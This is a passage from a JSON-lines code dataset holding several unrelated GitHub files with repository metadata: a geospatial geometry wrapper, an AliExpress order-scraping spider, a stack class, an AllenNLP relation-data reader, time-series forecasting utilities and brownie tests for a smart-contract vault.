0,\n\t'is_valid': 0,\n\t# projection to units\n\t'length': TRANSFORM_INPUT,\n\t# needs units\n\t'minimum_clearance': TRANSFORM_INPUT,\n\t# gives a polygon\n\t'minimum_rotated_rectangle': TRANSFORM_INPUT | RETURN_GEO,\n\t# internal method that re-orders points\n\t'normalize': 0,\n\t# distance calculation\n\t'project': TRANSFORM_INPUT,\n\t# complex; this might be wrong\n\t'relate': TRANSFORM_INPUT,\n\t'relate_pattern': TRANSFORM_INPUT,\n\t# does not matter as long as it's inside\n\t'representative_point': 0,\n\t# tolerance should be in units\n\t'simplify': TRANSFORM_INPUT | RETURN_GEO,\n\t# ??\n\t'svg': 0,\n\t# needs all\n\t'symmetric_difference': TRANSFORM_INPUT | RETURN_GEO,\n\t# don't think this is geometric\n\t'type': 0,\n\t# needs all\n\t'union': TRANSFORM_INPUT | RETURN_GEO,\n\t# same as .contains\n\t'within': TRANSFORM_INPUT | RETURN_GEO,\n\t'wkb': 0,\n\t'wkb_hex': 0,\n\t'wkt': 0,\n\t# no transform needed\n\t'xy': 0\n}\n\n# dir() is expensive, so cache by type\n@lru_cache(maxsize=8)\ndef parent_methods(parent_class):\n\treturn [f for f in dir(parent_class)]\n\nclass BaseGeometry():\n\n\tparent_class = None\n\n\tdef __init__(self, geo, crs: str, features: dict):\n\t\tself.features = features\n\t\tself.crs = crs\n\t\t# either a function generating a shapely.geometry, or a value\n\t\t# if the value is a sequence, pass it to the constructor\n\t\tif isinstance(geo, Sequence):\n\t\t\tself._geo_val = self.parent_class(geo)\n\t\telse:\n\t\t\tself._geo_val = geo\n\n\t@property\n\tdef _geo(self):\n\t\tif callable(self._geo_val):\n\t\t\tself._geo_val = self._geo_val()\n\n\t\treturn self._geo_val\n\n\t@lru_cache(maxsize=4)\n\tdef as_shapely(self, to_crs):\n\t\t\"\"\" Take the geometry as a shapely object in a coordinate system. \"\"\"\n\t\tif to_crs == self.crs:\n\t\t\treturn self._geo\n\n\t\ttransformer = pyproj_transform(self.crs, to_crs)\n\t\tdef np_transform(pts):\n\t\t\tfx, fy = transformer(pts[:, 0], pts[:, 1])\n\t\t\treturn np.dstack([fx, fy])[0]\n\n\t\treturn transform(self._geo, np_transform)\n\n\tdef __getitem__(self, item):\n\t\treturn self.features[item]\n\n\tdef __setitem__(self, item, value):\n\t\tself.features[item] = value\n\n\t@cached_property\n\tdef fast_bounds(self):\n\t\t# because PCS (traditionally) use northing and easting\n\t\t# as positive and this matches with EPSG:4326 generally,\n\t\t# let's use this to calculate fast bounds for PCS finding\n\n\t\t# avoid transformer altogether\n\t\tif self.crs == 'EPSG:4326':\n\t\t\treturn self._geo.bounds\n\n\t\t# this creates an *approximate* bounds of the polygon,\n\t\t# but does it very fast - for use only in the projection\n\t\t# selection algorithm\n\t\ttransformer = pyproj_transform(self.crs, 'EPSG:4326')\n\n\t\tminx, miny, maxx, maxy = self._geo.bounds\n\n\t\tminx, miny = transformer(minx, miny)\n\t\tmaxx, maxy = transformer(maxx, maxy)\n\n\t\treturn (minx, miny, maxx, maxy)\n\n\t@property\n\tdef __geo_interface__(self):\n\t\t\"\"\"Get a GeoJSON representation in EPSG:4326\"\"\"\n\t\treturn {\n\t\t\t'type': 'Feature',\n\t\t\t'geometry': self.as_shapely('EPSG:4326').__geo_interface__,\n\t\t\t'properties': self.features\n\t\t}\n\n\tdef __getattr__(self, name):\n\t\tif name not in parent_methods(self.parent_class):\n\t\t\traise AttributeError('\"%s\" has no attribute \"%s\"' % (str(type(self)), name))\n\n\t\ttarget = getattr(self.parent_class, name)\n\n\t\t# bind to self if callable\n\t\tif isinstance(target, property):\n\t\t\t# some properties are calculated in a local projection\n\t\t\tattr_flags = SHAPELY_METHODS[name] if name in SHAPELY_METHODS else 0\n\n\t\t\t# default to WGS84\n\t\t\tprojection = 'EPSG:4326'\n\t\t\tif attr_flags & TRANSFORM_INPUT:\n\t\t\t\t# wrap in appropriate PCS\n\t\t\t\tprojection = choose_pcs(box(*self.fast_bounds), units='meters')['crs']\n\n\t\t\t# perform op in chosen coordinate system\n\t\t\tret = target.fget(self.as_shapely(projection))\n\n\t\t\tif not attr_flags & RETURN_GEO:\n\t\t\t\treturn ret\n\n\t\t\t# transform geometry out\n\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\n\t\telif callable(target):\n\t\t\t# get attribute flags\n\t\t\tattr_flags = SHAPELY_METHODS[name]\n\n\t\t\tdef projection_wrapper(*args, **kwargs):\n\t\t\t\t# wrapper function for any method that could require\n\t\t\t\t# projecting to a cartesian coordinate plane\n\t\t\t\tcustom_args = [self, *args]\n\n\t\t\t\t# many methods require that we transform the self and other\n\t\t\t\t# arguments to a local projection before executing the op\n\t\t\t\tif attr_flags & TRANSFORM_INPUT:\n\t\t\t\t\t# wrap in appropriate PCS\n\t\t\t\t\t# get total bounds (minx, miny, maxx, maxy)\n\t\t\t\t\ttotal_bounds = [ obj.fast_bounds for obj in args if isinstance(obj, BaseGeometry) ] + [ self.fast_bounds ]\n\t\t\t\t\ttotal_bounds = ( min(map(lambda b: b[0], total_bounds)), min(map(lambda b: b[1], total_bounds)),\n\t\t\t\t\t\t\t\t\t max(map(lambda b: b[2], total_bounds)), max(map(lambda b: b[3], total_bounds)) )\n\n\t\t\t\t\tprojection = choose_pcs(box(*total_bounds), units='meters')['crs']\n\n\t\t\t\t\t# convert to projections and raw shapely objects\n\t\t\t\t\t# pass through if floats, other types, etc\n\t\t\t\t\t# beware of double projecting, which is why we do shapely first, then mundipy geometries\n\t\t\t\t\ttransformer = pyproj_transform('EPSG:4326', projection)\n\t\t\t\t\tcustom_args = [ transform(transformer, x) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\tcustom_args = [ x.as_shapely(projection) if isinstance(x, BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t# if we don't return a geometric object, we immediately\n\t\t\t\t# execute and return\n\t\t\t\tif not attr_flags & RETURN_GEO:\n\t\t\t\t\t# performing operations on invalid geometries can\n\t\t\t\t\t# throw GEOSException, but .make_valid is expensive.\n\t\t\t\t\t# We lazily repair invalid geometries upon error\n\t\t\t\t\ttry:\n\t\t\t\t\t\treturn target(*custom_args, **kwargs)\n\t\t\t\t\texcept GEOSException:\n\t\t\t\t\t\t# make_valid repairs invalid geometries\n\t\t\t\t\t\trepaired_args = [ make_valid(x) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\t\treturn target(*repaired_args, **kwargs)\n\n\t\t\t\ttry:\n\t\t\t\t\t# If we do return a geometry, there's a chance we need to\n\t\t\t\t\t# reproject into the geographic coordinate system, but also\n\t\t\t\t\t# a chance that we want to keep in the local projection.\n\t\t\t\t\t# Because of this, we create the geometry from local, and\n\t\t\t\t\t# will lazily transform to geographic if needed.\n\t\t\t\t\tret = target(*custom_args, **kwargs)\n\t\t\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\t\t\t\texcept GEOSException:\n\t\t\t\t\trepaired_args = [ make_valid(x) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\tret = target(*repaired_args, **kwargs)\n\t\t\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\n\t\t\treturn projection_wrapper\n\t\telse:\n\t\t\treturn target\n\nclass Point(BaseGeometry):\n\n\tparent_class = geom.Point\n\n\tdef __init__(self, geo: geom.Point, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiPoint(BaseGeometry):\n\n\tparent_class = geom.MultiPoint\n\n\tdef __init__(self, geo: geom.MultiPoint, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass LineString(BaseGeometry):\n\n\tparent_class = geom.LineString\n\n\tdef __init__(self, geo: geom.LineString, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiLineString(BaseGeometry):\n\n\tparent_class = geom.MultiLineString\n\n\tdef __init__(self, geo: geom.MultiLineString, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass Polygon(BaseGeometry):\n\n\tparent_class = geom.Polygon\n\n\tdef __init__(self, geo: geom.Polygon, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiPolygon(BaseGeometry):\n\n\tparent_class = geom.MultiPolygon\n\n\tdef __init__(self, geo: geom.MultiPolygon, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass GeometryCollection(BaseGeometry):\n\n\tparent_class = geom.GeometryCollection\n\n\tdef __init__(self, geo: geom.GeometryCollection, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\ndef enrich_geom(geo, features, pcs='EPSG:4326'):\n\t\"\"\"Enrich a shapely geometry with old features\"\"\"\n\tif isinstance(geo, geom.Point):\n\t\treturn Point(geo, pcs, features)\n\telif isinstance(geo, geom.MultiPoint):\n\t\treturn MultiPoint(geo, pcs, features)\n\telif isinstance(geo, geom.LineString):\n\t\treturn LineString(geo, pcs, features)\n\telif isinstance(geo, geom.MultiLineString):\n\t\treturn MultiLineString(geo, pcs, features)\n\telif isinstance(geo, geom.Polygon):\n\t\treturn Polygon(geo, pcs, features)\n\telif isinstance(geo, geom.MultiPolygon):\n\t\treturn MultiPolygon(geo, pcs, features)\n\telif isinstance(geo, geom.GeometryCollection):\n\t\treturn GeometryCollection(geo, pcs, features)\n\telse:\n\t\traise TypeError('enrich_geom got unsupported type %s' % str(type(geo)))\n\ndef loads(obj):\n\tif 'type' not in obj or obj['type'] != 'FeatureCollection':\n\t\traise ValueError('mundipy.geometry.loads expects type=FeatureCollection')\n\n\tif 'features' not in obj or not isinstance(obj['features'], list):\n\t\traise ValueError('mundipy.geometry.loads expects features to be a list')\n\n\treturn [ enrich_geom(shape(f['geometry']), f['properties']) for i, f in enumerate(obj['features']) ]\n\ndef dumps(features):\n\tif not isinstance(features, list):\n\t\traise TypeError('mundipy.geometry.dumps expects list of features')\n\n\treturn {\n\t\t'type': 'FeatureCollection',\n\t\t'features': [ f.__geo_interface__ for f in features ]\n\t}\n","repo_name":"BuntingLabs/mundipy","sub_path":"mundipy/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":12028,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"19"} +{"seq_id":"7042926168","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport urlparse\nfrom datetime import datetime\n\nimport scrapy\nfrom pybloom import ScalableBloomFilter\nfrom pymongo import MongoClient\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy_redis.spiders import RedisSpider\n\nfrom items import OrderItem\n\n\nclass OrderSpider(RedisSpider):\n name = \"order\"\n allowed_domains = [\"aliexpress.com\"]\n start_urls = (\n 'http://www.aliexpress.com/',\n )\n\n prefix = ''\n\n ids = ScalableBloomFilter(mode=ScalableBloomFilter.LARGE_SET_GROWTH)\n\n def __init__(self):\n self.filter = ScalableBloomFilter(mode=ScalableBloomFilter.LARGE_SET_GROWTH)\n self.orders = dict()\n self.redis_queue = None\n\n def get_queue(self):\n for value in set(self.server.smembers(self.redis_key)):\n yield value\n\n def start_requests(self):\n OrderSpider.prefix = self.settings['prefix']\n self.redis_key = '{}:order'.format(OrderSpider.prefix)\n\n self.redis_queue = self.get_queue()\n\n db = MongoClient().aliexpress\n for order in db['{}order'.format(OrderSpider.prefix)].find():\n OrderSpider.ids.add(order['_id'])\n\n yield self.next_request()\n\n def next_request(self):\n while True:\n try:\n url = next(self.redis_queue)\n except StopIteration:\n url = None\n\n if not (url and OrderSpider.ids.add(urlparse.parse_qs(urlparse.urlparse(url).query)['productId'][0])):\n break\n\n if url:\n return self.make_requests_from_url(url)\n else:\n raise CloseSpider('redis queue has no url to request')\n\n def make_requests_from_url(self, url):\n self.log('request order page: {}'.format(url), logging.INFO)\n parsed = urlparse.urlparse(url)\n product_id = urlparse.parse_qs(parsed.query)['productId'][0]\n return self.request(product_id, url)\n\n def request(self, product_id, base_url, page=1):\n order_url = '{}&page={}'.format(base_url, page)\n\n self.log('request order page: {}'.format(order_url), logging.INFO)\n return scrapy.Request(url=order_url, meta={'product_id': product_id, 'base_url': base_url, 'page': page},\n callback=self.parse)\n\n def parse(self, response):\n self.log('parse order page: {}'.format(response.url), logging.INFO)\n\n orders = json.loads(response.body.replace('\\\\', ''))\n records = [record for record in orders['records'] if not self.filter.add(record['id'])]\n\n if len(records) > 0:\n for record in records:\n date = datetime.strptime(record['date'], '%d %b %Y %H:%M')\n quantity = record['quantity']\n buyer_level = record['buyerAccountPointLeval']\n self.order(response.meta['product_id']).append_order(**{'date': date, 'quantity': quantity, 'buyer_level': buyer_level})\n\n return self.request(response.meta['product_id'], response.meta['base_url'], int(response.meta['page']) + 1)\n else:\n self.order(response.meta['product_id']).finish_order = True\n return self.pop_order(response.meta['product_id'])\n\n def order(self, id):\n if id not in self.orders:\n self.orders[id] = Order(id)\n return self.orders[id]\n\n def pop_order(self, id):\n if self.order(id).is_finish():\n order = self.orders.pop(id)\n\n self.log('crawl order: {}'.format(order), logging.INFO)\n\n item = OrderItem()\n item['prefix'] = OrderSpider.prefix\n item['_id'] = order.id\n item['orders'] = order.orders\n return item\n\n\nclass Order(object):\n def __init__(self, id):\n self.id = id\n self.orders = list()\n self.finish_order = False\n\n def append_order(self, **kwargs):\n self.orders.append(kwargs)\n\n def is_finish(self):\n return self.finish_order\n\n def __str__(self):\n return 'product id: {}, orders: {}'.format(self.id, len(self.orders))\n","repo_name":"yangxue088/aliexpress","sub_path":"spiders/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"4897567777","text":"from Node import Node\n\nclass Stack:\n\n def __init__(self):\n self.top = None\n self.size = 0\n\n def push(self, data):\n\n node = Node(data)\n\n if self.top is None:\n self.top = node\n else:\n node.next = self.top\n self.top = node\n\n self.size += 1\n\n def pop(self):\n\n if self.top is None:\n print('Stack is empty')\n else:\n if self.top.next:\n current = self.top\n next_node = current.next\n current.next = None\n current.data = None\n self.top = next_node\n else:\n current = self.top\n current.next = None\n current.data = None\n self.top = None\n\n self.size -= 1\n\n def peek(self):\n\n if self.top is None:\n return 'empty'\n else:\n return self.top.data\n\n def print_list(self):\n\n current = self.top\n\n while current is not None:\n print(current.data)\n current = current.next\n\n\n\nif __name__ == '__main__':\n words = Stack()\n\n words.push('egg')\n words.push('ham')\n words.push('spam')\n\n words.peek()\n words.pop()\n words.peek()\n words.pop()\n words.peek()\n words.pop()\n words.peek()","repo_name":"Aryan-Patel5475/Data-Structure-and-Algorithm","sub_path":"Stack/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34587737998","text":"from typing import Dict\nimport json\nimport logging\n\nfrom overrides import overrides\n\nimport tqdm\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.data.dataset import Dataset\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import LabelField, TextField, SequenceLabelField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.tokenizers import Token, Tokenizer, WordTokenizer\nfrom allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\n@DatasetReader.register(\"full_context_relations\")\nclass FullContextRelationDatasetReader(DatasetReader):\n \"\"\"\n Reads a JSON-lines file containing entity to entity, relative positions, left context, right context, POS tags, NER tags and relation labels.\n\n Expected format for each input line: {\"text\": \"\", \"relpos1\": [], \"relpos2\" : [], \"left_context\" : \"\", 'right_context\" : \"\", \"pos\" : [], \"entity\" :[], \"relation\" : \"\" }\n\n The JSON could have other fields, too, but they are ignored.\n\n Parameters\n ----------\n tokenizer : ``Tokenizer``, optional\n Tokenizer to use to split the title and abstrct into words or other kinds of tokens.\n Defaults to ``WordTokenizer()``.\n token_indexers : ``Dict[str, TokenIndexer]``, optional\n Indexers used to define input token representations. Defaults to ``{\"tokens\":\n SingleIdTokenIndexer()}``.\n \"\"\"\n def __init__(self,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None) -> None:\n self._tokenizer = tokenizer or WordTokenizer()\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n\n @overrides\n def read(self, file_path):\n instances = []\n with open(cached_path(file_path), \"r\") as data_file:\n logger.info(\"Reading instances from lines in file at: %s\", file_path)\n for line_num, line in enumerate(tqdm.tqdm(data_file.readlines())):\n line = line.strip(\"\\n\")\n if not line:\n continue\n paper_json = json.loads(line)\n e2e = paper_json[\"e2e\"][\"text\"]\n left_context = paper_json[\"left_context\"]\n if left_context:\n left_context = paper_json[\"left_context\"][\"text\"]\n right_context = paper_json[\"right_context\"]\n if right_context:\n right_context = paper_json[\"right_context\"][\"text\"]\n\n pos_tags = paper_json[\"e2e\"][\"pos\"]\n entity_tags = paper_json[\"e2e\"][\"entity\"]\n relpos1 = paper_json[\"e2e\"][\"relpos1\"]\n relpos2 = paper_json[\"e2e\"][\"relpos2\"]\n relation_label = paper_json[\"relation\"]\n\n # e2e tokens.\n e2e_tokens = [ Token(e2e_token) for e2e_token in e2e]\n e2e_sequence = TextField(e2e_tokens, self._token_indexers)\n\n # Left context tokens.\n left_context_tokens = [ Token(token) for token in left_context]\n left_context_sequence = TextField(left_context_tokens, self._token_indexers)\n \n # Right context tokens.\n right_context_tokens = [ Token(token) for token in right_context]\n right_context_sequence = TextField(right_context_tokens, self._token_indexers)\n\n instance_fields = {\"e2e_tokens\" : e2e_sequence, \"left_context_tokens\": left_context_sequence, \"right_context_tokens\" : right_context_sequence}\n\n # Add POS tags.\n instance_fields[\"pos_tags\"] = SequenceLabelField(pos_tags, e2e_sequence, \"pos_tags\")\n\n # Add NER tags.\n instance_fields[\"entity_tags\"] = SequenceLabelField(entity_tags, e2e_sequence, \"entity_tags\")\n\n # Add relpos1.\n instance_fields[\"relpos1_tags\"] = SequenceLabelField(relpos1, e2e_sequence, \"relpos1_tags\")\n\n # Add relpos2.\n instance_fields[\"relpos2_tags\"] = SequenceLabelField(relpos2, e2e_sequence, \"relpos2_tags\")\n\n # Add relation label.\n instance_fields[\"relation_label\"] = LabelField(relation_label)\n\n instances.append(Instance(instance_fields))\n if not instances:\n raise ConfigurationError(\"No instances read!\")\n return Dataset(instances)\n\n @overrides\n # TODO: rewrite this.\n def text_to_instance(self, title: str, abstract: str, venue: str = None) -> Instance: # type: ignore\n # pylint: disable=arguments-differ\n tokenized_title = self._tokenizer.tokenize(title)\n tokenized_abstract = self._tokenizer.tokenize(abstract)\n title_field = TextField(tokenized_title, self._token_indexers)\n abstract_field = TextField(tokenized_abstract, self._token_indexers)\n fields = {'title': title_field, 'abstract': abstract_field}\n if venue is not None:\n fields['label'] = LabelField(venue)\n return Instance(fields)\n\n @classmethod\n def from_params(cls, params: Params) -> 'FullContextRelationDatasetReader':\n tokenizer = Tokenizer.from_params(params.pop('tokenizer', {}))\n token_indexers = TokenIndexer.dict_from_params(params.pop('token_indexers', {}))\n params.assert_empty(cls.__name__)\n return cls(tokenizer=tokenizer, token_indexers=token_indexers)\n","repo_name":"ramakumar1729/NN4NLP","sub_path":"relation_classifier/dataset_readers/full_context_relations.py","file_name":"full_context_relations.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22822296535","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the equal function below.\ndef equal(arr):\n\n def best( n ): # greedy algorithm\n r5 = n // 5\n r2 = ( n - ( r5 * 5 ) ) // 2\n r1 = n - ( ( r5 * 5 ) + ( r2 * 2 ) )\n return [ r5, r2, r1 ]\n\n if len( arr )<2:\n return 0\n\n arr.sort()\n\n ops = 1000 * len(arr)\n for y in range( 0, 5 ): # 0-4 decrement first element \n stps = 0 if y==0 else 1\n for x in range( 1, len( arr ) ): # can we go into negatives with bigger y's?\n# count( x, 0 if y==0 or bst[0][0] )\n ds = best( arr[x]-(arr[0]-y) )\n stps = stps + ( ds[0] + ds[1] + ds[2] )\n# if ( ds[0] + ds[1] + ds[0] )<=6: print( \"stps:{} ds:{} ops:{} y:{}\".format( stps, ds, ops, y) )\n if stps 200, :].index\r\n\r\n for x in outlier_index:\r\n data.loc[x, 'speed'] = data.loc[x - 1, 'speed']\r\n\r\n data.drop(cols_to_drop, axis=1, inplace=True)\r\n data = data.set_index('timeStamp')\r\n\r\n if resample:\r\n data = data.resample(\"1S\").first().ffill()\r\n\r\n data['date'] = data.index.copy()\r\n\r\n data.drop(['date'], axis=1, inplace=True)\r\n\r\n print(data)\r\n\r\n return data\r\n\r\n\r\ndef make_dirs(path):\r\n \"\"\"Make Directory If not Exists\"\"\"\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n\r\ndef plot_full(path, data, id, feature):\r\n \"\"\"Plot Full Graph of Drive Cycle of Specific Device ID\"\"\"\r\n data.plot(y=feature, figsize=(16, 8))\r\n plt.xlabel('DateTime', fontsize=10)\r\n plt.xticks(rotation=45)\r\n plt.ylabel('Speed', fontsize=10)\r\n plt.grid()\r\n plt.title('Drive Cycle of Device ID {}'.format(id))\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}.png'.format(id)))\r\n\r\n\r\ndef plot_split(path, data, id, valid_start, test_start, feature):\r\n \"\"\"Plot Splitted Graph of Drive Cycle of Specific Device ID\"\"\"\r\n data[data.index < valid_start][[feature]].rename(columns={feature: 'train'}) \\\r\n .join(data[(data.index >= valid_start) & (data.index < test_start)][[feature]] \\\r\n .rename(columns={feature: 'validation'}), how='outer') \\\r\n .join(data[data.index >= test_start][[feature]].rename(columns={feature: 'test'}), how='outer') \\\r\n .plot(y=['train', 'validation', 'test'], figsize=(16, 8), fontsize=15)\r\n\r\n plt.xlabel('DateTime', fontsize=10)\r\n plt.xticks(rotation=45)\r\n plt.ylabel('Speed', fontsize=10)\r\n plt.grid()\r\n plt.title('Drive Cycle of Device ID {} Splitted'.format(id))\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}_Splitted.png'.format(id)))\r\n\r\n\r\ndef split_sequence_uni_step(sequence, n_steps):\r\n \"\"\"Rolling Window Function for Uni-step\"\"\"\r\n\r\n sequence = sequence.values\r\n\r\n X, y = list(), list()\r\n\r\n for i in range(len(sequence)):\r\n end_ix = i + n_steps\r\n\r\n if end_ix > len(sequence)-1:\r\n break\r\n\r\n seq_x, seq_y = sequence[i:end_ix], sequence[end_ix]\r\n\r\n X.append(seq_x)\r\n y.append(seq_y)\r\n\r\n return np.array(X), np.array(y)\r\n\r\n\r\ndef split_sequence_multi_step(sequence, n_steps_in, n_steps_out):\r\n \"\"\"Rolling Window Function for Multi-step\"\"\"\r\n\r\n sequence = sequence.values\r\n\r\n X, y = list(), list()\r\n\r\n for i in range(len(sequence)):\r\n end_ix = i + n_steps_in\r\n out_end_ix = end_ix + n_steps_out\r\n\r\n if out_end_ix > len(sequence):\r\n break\r\n\r\n seq_x, seq_y = sequence[i:end_ix], sequence[end_ix:out_end_ix]\r\n\r\n X.append(seq_x)\r\n y.append(seq_y)\r\n\r\n return np.array(X), np.array(y)[:, :, 0]\r\n\r\n\r\ndef get_data_loader(X, y, train_split, test_split, batch_size):\r\n \"\"\"Get Data Loader\"\"\"\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=train_split, shuffle=False)\r\n X_valid, X_test, y_valid, y_test = train_test_split(X_test, y_test, train_size=test_split, shuffle=False)\r\n\r\n # Wrap for Data Loader #\r\n train_set = TensorDataset(torch.from_numpy(X_train), torch.from_numpy(y_train))\r\n val_set = TensorDataset(torch.from_numpy(X_valid), torch.from_numpy(y_valid))\r\n test_set = TensorDataset(torch.from_numpy(X_test), torch.from_numpy(y_test))\r\n\r\n # Prepare Data Loader #\r\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=False)\r\n val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)\r\n test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, drop_last=True)\r\n\r\n return train_loader, val_loader, test_loader\r\n\r\n\r\ndef test_plot(pred, actual, path, feature, id, network, transfer_learning=False):\r\n \"\"\"Plot Test set of Drive Cycle of Specific Device ID\"\"\"\r\n\r\n plt.figure(figsize=(10, 8))\r\n plt.plot(pred, label='Pred')\r\n plt.plot(actual, label='Actual')\r\n\r\n plt.xlabel('DateTime', fontsize=12)\r\n plt.xticks()\r\n plt.ylabel(feature, fontsize=12)\r\n plt.grid()\r\n plt.legend(fontsize=16)\r\n\r\n if transfer_learning:\r\n plt.title('Drive Cycle of Device ID {} Prediction using Pre-trained {}'.format(id, network.__class__.__name__), fontsize=18)\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}_Test_{}_Transfer_Detailed.png'.format(id, network.__class__.__name__)))\r\n plt.show()\r\n else:\r\n plt.title('Drive Cycle of Device ID {} Prediction using {}'.format(id, network.__class__.__name__), fontsize=18)\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}_Test_{}.png'.format(id, network.__class__.__name__)))\r\n plt.show()\r\n\r\n\r\ndef percentage_error(actual, predicted):\r\n \"\"\"Percentage Error\"\"\"\r\n res = np.empty(actual.shape)\r\n for j in range(actual.shape[0]):\r\n if actual[j] != 0:\r\n res[j] = (actual[j] - predicted[j]) / actual[j]\r\n else:\r\n res[j] = predicted[j] / np.mean(actual)\r\n return res\r\n\r\n\r\ndef mean_percentage_error(y_true, y_pred):\r\n \"\"\"Mean Percentage Error\"\"\"\r\n mpe = np.mean(percentage_error(np.asarray(y_true), np.asarray(y_pred))) * 100\r\n return mpe\r\n\r\n\r\ndef mean_absolute_percentage_error(y_true, y_pred):\r\n \"\"\"Mean Absolute Percentage Error\"\"\"\r\n mape = np.mean(np.abs(percentage_error(np.asarray(y_true), np.asarray(y_pred)))) * 100\r\n return mape\r\n\r\n\r\ndef get_lr_scheduler(optimizer, args):\r\n \"\"\"Learning Rate Scheduler\"\"\"\r\n if args.lr_scheduler == 'step':\r\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=args.lr_decay_every, gamma=args.lr_decay_rate)\r\n elif args.lr_scheduler == 'plateau':\r\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)\r\n elif args.lr_scheduler == 'cosine':\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.num_epochs, eta_min=0)\r\n else:\r\n raise NotImplementedError\r\n\r\n return scheduler","repo_name":"KBS9622/IntelliCharga","sub_path":"Main Body/TimeSeriesPredictionUsingDL/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25242640250","text":"from consts import *\nfrom shared_tests import *\nfrom brownie import reverts\nfrom brownie.test import given, strategy\nimport random\n\n\n@given(\n st_srcChain=strategy(\"uint32\"),\n st_srcAddress=strategy(\"bytes\"),\n st_message=strategy(\"bytes\"),\n st_sender=strategy(\"address\"),\n)\ndef test_executexCall(\n cf,\n cfTester,\n st_sender,\n st_srcChain,\n st_srcAddress,\n st_message,\n):\n cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n\n startBalVault = cf.vault.balance()\n startBalRecipient = cfTester.balance()\n\n message = hexStr(st_message)\n args = [\n cfTester.address,\n st_srcChain,\n st_srcAddress,\n message,\n ]\n tx = signed_call_cf(cf, cf.vault.executexCall, *args, sender=st_sender)\n\n assert cf.vault.balance() == startBalVault\n assert cfTester.balance() == startBalRecipient\n\n assert tx.events[\"ReceivedxCall\"][0].values() == [\n st_srcChain,\n hexStr(st_srcAddress),\n message,\n 0,\n ]\n\n\n# token contract doesn't have the cfReceivexCall function implemented\ndef test_executexCall_rev_noCfReceive(cf, token):\n cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n randToken = random.choice([NATIVE_ADDR, token])\n\n args = [\n randToken,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts():\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\ndef test_executexCall_rev_nzAddrs(cf):\n args = [\n ZERO_ADDR,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts(REV_MSG_NZ_ADDR):\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\ndef test_executexCallEth_rev_msgHash(cf):\n args = [\n NON_ZERO_ADDR,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n\n sigData = AGG_SIGNER_1.getSigDataWithNonces(\n cf.keyManager, cf.vault.executexCall, nonces, *args\n )\n\n sigData_modif = sigData[:]\n sigData_modif[0] += 1\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n sigData_modif = sigData[:]\n sigData_modif[1] += 1\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n sigData_modif = sigData[:]\n sigData_modif[2] = NON_ZERO_ADDR\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n\n# rev if cfReceiver reverts the call\ndef test_executexCallEth_rev_CFReceiver(cf, cfReceiverFailMock):\n 